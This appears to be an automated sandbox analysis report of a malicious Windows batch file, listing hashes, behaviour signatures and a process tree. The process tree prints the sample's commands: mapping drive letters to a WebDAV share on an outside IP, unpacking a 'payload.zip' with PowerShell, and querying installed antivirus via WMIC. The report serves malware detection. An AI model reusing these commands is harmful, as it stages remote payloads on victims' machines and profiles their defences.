Analysis
max time kernel: 121s
max time network: 125s
platform: windows7_x64
resource: win7-20230831-en
resource tags: arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
submitted: 12/10/2023, 00:51
Static task: static1
Behavioral task: behavioral1
  Sample: 5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4_JC.bat
  Resource: win7-20230831-en
Behavioral task: behavioral2
  Sample: 5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4_JC.bat
  Resource: win10v2004-20230915-en
General
Target: 5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4_JC.bat
Size: 1KB
MD5: 3e04fa57bc1837dd6eb1ddfaaa0c8fb3
SHA1: 52c4646dd2796cb4da7a50f6777e3a18f9d48179
SHA256: 5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4
SHA512: d6679d25b561ff1162a9efffea72deff19e5b1b5a4fe74c5fca590fa1df276f0e24ae6f838a7fc5751533c15553c99c94fec2d3d86d4f6823c1579a9438f0bc6
Malware Config
Signatures
Enumerates connected drives (3 TTPs, 23 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
description               ioc     Process
File opened (read-only)   \??\J:  net.exe
File opened (read-only)   \??\G:  net.exe
File opened (read-only)   \??\E:  net.exe
File opened (read-only)   \??\L:  net.exe
File opened (read-only)   \??\K:  net.exe
File opened (read-only)   \??\T:  net.exe
File opened (read-only)   \??\Q:  net.exe
File opened (read-only)   \??\H:  net.exe
File opened (read-only)   \??\B:  net.exe
File opened (read-only)   \??\A:  net.exe
File opened (read-only)   \??\Y:  net.exe
File opened (read-only)   \??\X:  net.exe
File opened (read-only)   \??\V:  net.exe
File opened (read-only)   \??\U:  net.exe
File opened (read-only)   \??\S:  net.exe
File opened (read-only)   \??\R:  net.exe
File opened (read-only)   \??\P:  net.exe
File opened (read-only)   \??\O:  net.exe
File opened (read-only)   \??\N:  net.exe
File opened (read-only)   \??\Z:  net.exe
File opened (read-only)   \??\W:  net.exe
File opened (read-only)   \??\M:  net.exe
File opened (read-only)   \??\I:  net.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses (1 IoC)
pid   Process
2588  powershell.exe
Suspicious use of AdjustPrivilegeToken (41 IoCs)
description                           pid   Process
Token: SeDebugPrivilege               2588  powershell.exe
Token: SeIncreaseQuotaPrivilege       1820  WMIC.exe
Token: SeSecurityPrivilege            1820  WMIC.exe
Token: SeTakeOwnershipPrivilege       1820  WMIC.exe
Token: SeLoadDriverPrivilege          1820  WMIC.exe
Token: SeSystemProfilePrivilege       1820  WMIC.exe
Token: SeSystemtimePrivilege          1820  WMIC.exe
Token: SeProfSingleProcessPrivilege   1820  WMIC.exe
Token: SeIncBasePriorityPrivilege     1820  WMIC.exe
Token: SeCreatePagefilePrivilege      1820  WMIC.exe
Token: SeBackupPrivilege              1820  WMIC.exe
Token: SeRestorePrivilege             1820  WMIC.exe
Token: SeShutdownPrivilege            1820  WMIC.exe
Token: SeDebugPrivilege               1820  WMIC.exe
Token: SeSystemEnvironmentPrivilege   1820  WMIC.exe
Token: SeRemoteShutdownPrivilege      1820  WMIC.exe
Token: SeUndockPrivilege              1820  WMIC.exe
Token: SeManageVolumePrivilege        1820  WMIC.exe
Token: 33                             1820  WMIC.exe
Token: 34                             1820  WMIC.exe
Token: 35                             1820  WMIC.exe
Token: SeIncreaseQuotaPrivilege       1820  WMIC.exe
Token: SeSecurityPrivilege            1820  WMIC.exe
Token: SeTakeOwnershipPrivilege       1820  WMIC.exe
Token: SeLoadDriverPrivilege          1820  WMIC.exe
Token: SeSystemProfilePrivilege       1820  WMIC.exe
Token: SeSystemtimePrivilege          1820  WMIC.exe
Token: SeProfSingleProcessPrivilege   1820  WMIC.exe
Token: SeIncBasePriorityPrivilege     1820  WMIC.exe
Token: SeCreatePagefilePrivilege      1820  WMIC.exe
Token: SeBackupPrivilege              1820  WMIC.exe
Token: SeRestorePrivilege             1820  WMIC.exe
Token: SeShutdownPrivilege            1820  WMIC.exe
Token: SeDebugPrivilege               1820  WMIC.exe
Token: SeSystemEnvironmentPrivilege   1820  WMIC.exe
Token: SeRemoteShutdownPrivilege      1820  WMIC.exe
Token: SeUndockPrivilege              1820  WMIC.exe
Token: SeManageVolumePrivilege        1820  WMIC.exe
Token: 33                             1820  WMIC.exe
Token: 34                             1820  WMIC.exe
Token: 35                             1820  WMIC.exe
Suspicious use of WriteProcessMemory (64 IoCs)
description                       pid   Process  procid_target
PID 3068 wrote to memory of 652   3068  cmd.exe  29
PID 3068 wrote to memory of 652   3068  cmd.exe  29
PID 3068 wrote to memory of 652   3068  cmd.exe  29
PID 652 wrote to memory of 1716   652   cmd.exe  31
PID 652 wrote to memory of 1716   652   cmd.exe  31
PID 652 wrote to memory of 1716   652   cmd.exe  31
PID 652 wrote to memory of 1700   652   cmd.exe  32
PID 652 wrote to memory of 1700   652   cmd.exe  32
PID 652 wrote to memory of 1700   652   cmd.exe  32
PID 652 wrote to memory of 2024   652   cmd.exe  33
PID 652 wrote to memory of 2024   652   cmd.exe  33
PID 652 wrote to memory of 2024   652   cmd.exe  33
PID 652 wrote to memory of 2108   652   cmd.exe  34
PID 652 wrote to memory of 2108   652   cmd.exe  34
PID 652 wrote to memory of 2108   652   cmd.exe  34
PID 652 wrote to memory of 1028   652   cmd.exe  35
PID 652 wrote to memory of 1028   652   cmd.exe  35
PID 652 wrote to memory of 1028   652   cmd.exe  35
PID 652 wrote to memory of 1768   652   cmd.exe  36
PID 652 wrote to memory of 1768   652   cmd.exe  36
PID 652 wrote to memory of 1768   652   cmd.exe  36
PID 652 wrote to memory of 2940   652   cmd.exe  37
PID 652 wrote to memory of 2940   652   cmd.exe  37
PID 652 wrote to memory of 2940   652   cmd.exe  37
PID 652 wrote to memory of 2608   652   cmd.exe  38
PID 652 wrote to memory of 2608   652   cmd.exe  38
PID 652 wrote to memory of 2608   652   cmd.exe  38
PID 652 wrote to memory of 2404   652   cmd.exe  39
PID 652 wrote to memory of 2404   652   cmd.exe  39
PID 652 wrote to memory of 2404   652   cmd.exe  39
PID 652 wrote to memory of 2004   652   cmd.exe  40
PID 652 wrote to memory of 2004   652   cmd.exe  40
PID 652 wrote to memory of 2004   652   cmd.exe  40
PID 652 wrote to memory of 2616   652   cmd.exe  41
PID 652 wrote to memory of 2616   652   cmd.exe  41
PID 652 wrote to memory of 2616   652   cmd.exe  41
PID 652 wrote to memory of 2620   652   cmd.exe  42
PID 652 wrote to memory of 2620   652   cmd.exe  42
PID 652 wrote to memory of 2620   652   cmd.exe  42
PID 652 wrote to memory of 2820   652   cmd.exe  43
PID 652 wrote to memory of 2820   652   cmd.exe  43
PID 652 wrote to memory of 2820   652   cmd.exe  43
PID 652 wrote to memory of 2780   652   cmd.exe  44
PID 652 wrote to memory of 2780   652   cmd.exe  44
PID 652 wrote to memory of 2780   652   cmd.exe  44
PID 652 wrote to memory of 2712   652   cmd.exe  45
PID 652 wrote to memory of 2712   652   cmd.exe  45
PID 652 wrote to memory of 2712   652   cmd.exe  45
PID 652 wrote to memory of 2956   652   cmd.exe  46
PID 652 wrote to memory of 2956   652   cmd.exe  46
PID 652 wrote to memory of 2956   652   cmd.exe  46
PID 652 wrote to memory of 2804   652   cmd.exe  47
PID 652 wrote to memory of 2804   652   cmd.exe  47
PID 652 wrote to memory of 2804   652   cmd.exe  47
PID 652 wrote to memory of 2552   652   cmd.exe  48
PID 652 wrote to memory of 2552   652   cmd.exe  48
PID 652 wrote to memory of 2552   652   cmd.exe  48
PID 652 wrote to memory of 2740   652   cmd.exe  49
PID 652 wrote to memory of 2740   652   cmd.exe  49
PID 652 wrote to memory of 2740   652   cmd.exe  49
PID 652 wrote to memory of 2000   652   cmd.exe  50
PID 652 wrote to memory of 2000   652   cmd.exe  50
PID 652 wrote to memory of 2000   652   cmd.exe  50
PID 652 wrote to memory of 2648   652   cmd.exe  51
Processes (indentation shows parent/child depth in the process tree)

C:\Windows\system32\cmd.exe  (PID 3068)
  cmd /c "C:\Users\Admin\AppData\Local\Temp\5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4_JC.bat"
  Signature: Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe  (PID 652)
    cmd /c C:\Users\Admin\AppData\Local\Temp\5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4_JC.bat min
    Signature: Suspicious use of WriteProcessMemory

    C:\Windows\system32\net.exe  (PID 1716)
      net use Z: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 1700)
      net use Y: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 2024)
      net use X: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 2108)
      net use W: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 1028)
      net use V: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 1768)
      net use U: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 2940)
      net use T: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 2608)
      net use S: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 2404)
      net use R: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 2004)
      net use Q: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 2616)
      net use P: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 2620)
      net use O: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 2820)
      net use N: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 2780)
      net use M: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 2712)
      net use L: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 2956)
      net use K: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 2804)
      net use J: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 2552)
      net use I: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 2740)
      net use H: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 2000)
      net use G: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 2648)
      net use F: \\172.96.161.208@8080\DavWWWRoot /user:username password

    C:\Windows\system32\net.exe  (PID 2680)
      net use E: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 2624)
      net use D: \\172.96.161.208@8080\DavWWWRoot /user:username password

    C:\Windows\system32\net.exe  (PID 2516)
      net use C: \\172.96.161.208@8080\DavWWWRoot /user:username password

    C:\Windows\system32\net.exe  (PID 2528)
      net use B: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\system32\net.exe  (PID 2548)
      net use A: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signature: Enumerates connected drives

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2588)
      powershell -command "Expand-Archive -Path 'C:\Users\Admin\Pictures\payload.zip' -DestinationPath 'C:\Users\Admin\Pictures\' -Force"
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\net.exe  (PID 852)
      net use /delete

      C:\Windows\system32\net1.exe  (PID 1440)
        C:\Windows\system32\net1 use /delete

    C:\Windows\system32\cmd.exe  (PID 2860)
      C:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName /value

      C:\Windows\System32\Wbem\WMIC.exe  (PID 1820)
        wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName /value
        Signature: Suspicious use of AdjustPrivilegeToken